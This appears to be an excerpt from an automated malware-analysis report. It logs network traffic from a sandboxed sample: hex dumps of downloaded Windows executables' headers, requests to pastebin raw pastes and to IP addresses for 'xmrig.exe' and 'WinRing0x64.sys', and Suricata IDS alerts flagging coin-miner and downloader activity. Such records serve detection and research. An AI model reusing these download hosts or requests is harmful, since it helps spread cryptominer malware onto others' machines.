05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c a8 02 00 50 00 00 00 00 c0 03 00 08 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 04 00 b4 17 00 00 b0 9e 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 9e 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 eb 01 00 00 10 00 00 00 ec 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 b1 00 00 00 00 02 00 00 b2 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 e6 00 00 00 c0 02 00 00 0a 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 b8 00 00 00 00 b0 03 00 00 02 00 00 00 ac 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 06 01 00 00 c0 03 00 00 08 01 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b4 17 00 00 00 d0 04 00 00 18 00 00 00 b6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sat, 11 Jun 1932 19:49:55 GMTAccept-Ranges: bytesETag: "80734451de96731:0"Server: Microsoft-IIS/10.0Date: Mon, 27 Jan 2025 07:19:17 GMTContent-Length: 995920Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ee e0 01 cf aa 81 6f 9c aa 81 6f 9c aa 81 6f 9c 79 f3 6c 9d a0 81 6f 9c 79 f3 6a 9d 38 81 6f 9c 79 f3 6b 9d be 81 6f 9c 0e ff 6a 9d 83 81 6f 9c 0e ff 6b 9d bb 81 6f 9c 0e ff 6c 9d b8 81 6f 9c 79 f3 6e 9d a3 81 6f 9c aa 81 6e 9c c8 81 6f 9c 88 fe 6a 9d a8 81 6f 9c 88 fe 90 9c ab 81 6f 9c 88 fe 6d 9d ab 81 6f 9c 52 69 63 68 aa 81 6f 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 eb 8f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 24 00 aa 04 00 00 6c 0a 00 00 00 00 00 76 19 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0f 00 00 04 00 00 57 fd 0f 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 4c 05 00 64 00 00 00 00 80 05 00 98 91 09 00 00 00 00 00 00 00 00 00 00 06 0f 00 50 2c 00 00 00 20 0f 00 10 24 00 00 20 38 05 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 37 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 96 00 00 00 c0 04 00 00 96 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 1c 00 00 00 60 05 00 00 0a 00 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 91 09 00 00 80 05 00 00 92 09 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 24 00 00 00 20 0f 00 00 26 00 00 00 e0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: NginxDate: Mon, 27 Jan 2025 07:20:18 GMTContent-Type: application/octet-streamContent-Length: 6271259Last-Modified: Tue, 21 Jan 2025 18:40:08 GMTConnection: closeETag: "678fea08-5fb11b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dc a4 68 5a 98 c5 06 09 98 c5 06 09 98 c5 06 09 2c 59 f7 09 94 c5 06 09 2c 59 f5 09 34 c5 06 09 2c 59 f4 09 80 c5 06 09 a3 9b 05 08 8a c5 06 09 a3 9b 03 08 85 c5 06 09 a3 9b 02 08 8a c5 06 09 45 3a cd 09 9f c5 06 09 98 c5 07 09 eb c5 06 09 0a 9b 02 08 89 c5 06 09 0a 9b f9 09 99 c5 06 09 0a 9b 04 08 99 c5 06 09 52 69 63 68 98 c5 06 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 15 9a 8e 5b 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 ec 01 00 00 de 01 00 00 00 00 00 d3 79 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c a8 02 00 50 00 00 00 00 c0 03 00 08 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 04 00 b4 17 00 00 b0 9e 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 9e 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 eb 01 00 00 10 00 00 00 ec 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 b1 00 00 00 00 02 00 00 b2 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 e6 00 00 00 c0 02 00 00 0a 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 b8 00 00 00 00 b0 03 00 00 02 00 00 00 ac 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 06 01 00 00 c0 03 00 00 08 01 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b4 17 00 00 00 d0 04 00 00 18 00 00 00 b6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Wed, 24 Feb 1926 08:27:55 GMTAccept-Ranges: bytesETag: "80b75c27ef876c1:0"Server: Microsoft-IIS/10.0Date: Mon, 27 Jan 2025 07:19:17 GMTContent-Length: 950600Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ee e0 01 cf aa 81 6f 9c aa 81 6f 9c aa 81 6f 9c 79 f3 6c 9d a0 81 6f 9c 79 f3 6a 9d 38 81 6f 9c 79 f3 6b 9d be 81 6f 9c 0e ff 6a 9d 83 81 6f 9c 0e ff 6b 9d bb 81 6f 9c 0e ff 6c 9d b8 81 6f 9c 79 f3 6e 9d a3 81 6f 9c aa 81 6e 9c c8 81 6f 9c 88 fe 6a 9d a8 81 6f 9c 88 fe 90 9c ab 81 6f 9c 88 fe 6d 9d ab 81 6f 9c 52 69 63 68 aa 81 6f 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 eb 8f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 24 00 aa 04 00 00 be 09 00 00 00 00 00 76 19 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0e 00 00 04 00 00 c3 3a 0f 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 4c 05 00 64 00 00 00 00 80 05 00 60 e3 08 00 00 00 00 00 00 00 00 00 00 58 0e 00 48 29 00 00 00 70 0e 00 10 24 00 00 20 38 05 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 37 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 96 00 00 00 c0 04 00 00 96 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 1c 00 00 00 60 05 00 00 0a 00 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 e3 08 00 00 80 05 00 00 e4 08 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 24 00 00 00 70 0e 00 00 26 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Jan 2025 07:20:18 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 24 Jan 2025 03:29:56 GMTETag: "12400-62c6b5731084d"Accept-Ranges: bytesContent-Length: 74752Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 09 93 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 01 00 00 08 00 00 00 00 00 00 6e 38 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 38 01 00 4f 00 00 00 00 40 01 00 b6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 18 01 00 00 20 00 00 00 1a 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b6 04 00 00 00 40 01 00 00 06 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 38 01 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 64 00 00 10 d4 00 00 01 00 00 00 26 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 18 00 00 0a 2a 1a 72 01 00 00 70 2a 1a 20 e1 e7 65 05 2a 1e 02 28 19 00 00 0a 2a 1a 72 57 00 00 70 2a 1a 20 c6 28 54 04 2a a6 73 1a 00 00 0a 80 01 00 00 04 73 1b 00 00 0a 80 02 00 00 04 73 1c 00 00 0a 80 03 00 00 04 73 1d 00 00 0a 80 04 00 00 04 2a 1a 72 f6 00 00 70 2a 1a 20 1a 78 21 05 2a 1a 72 95 01 00 70 2a 1a 72 34 02 00 70 2a 1a 20 1b 41 cd 05 2a 1a 72 d3 02 00 70 2a 1a 20 22 df 0f 00 2a 1a 72 72 03 00 70 2a 1a 20 86 df 73 02 2a 1e 02 28 28 00 00 0a 2a 1a 72 07 06 00 70 2a 1a 20 bc 1e 08 02 2a 1a 72 a6 06 00 70 2a 1a 20 2a 70 7b 01 2a c2 28 2b 00 00 06 2d 07 28 2c 00 00 06 2c 02 2b 07 28 2d 00 00 06 2c 02 2b 07 28 2a 00 00 06 2c 02 2b 07 28 29 00 00 06 2c 06 14 28 5a 00 00 0a 2a 22 28 c8 00 00 06 2b 00 2a 26 28 1b 01 00 06 26 2b 00 2a ee 2b 35 73 6b 00 00 0a 20 b8 0b 00 00 20 10 27 00 00 6f 6c 00 00 0a 28 2c 00 00 0a 7e 12 00 00 04 2d 0a 28 5f 00 00 06 28 51 00 00 06 7e 18 00 00 04 6f 6d 00 00 0a 26 17 2d c8 2a 1a 72
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:27 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:27 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /raw/djZsmRNC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /raw/7G6zzQwJ HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49782 -> 18.230.108.113:80
                            Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.6:49775 -> 185.215.113.51:80
                            Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.6:49774 -> 159.65.122.137:8080
                            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49758 -> 45.141.26.234:80
                            Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.215.113.51:80 -> 192.168.2.6:49776
                            Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.6:49948 -> 185.215.113.51:80
                            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49842 -> 185.199.108.133:443
                            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49836 -> 185.199.111.133:443
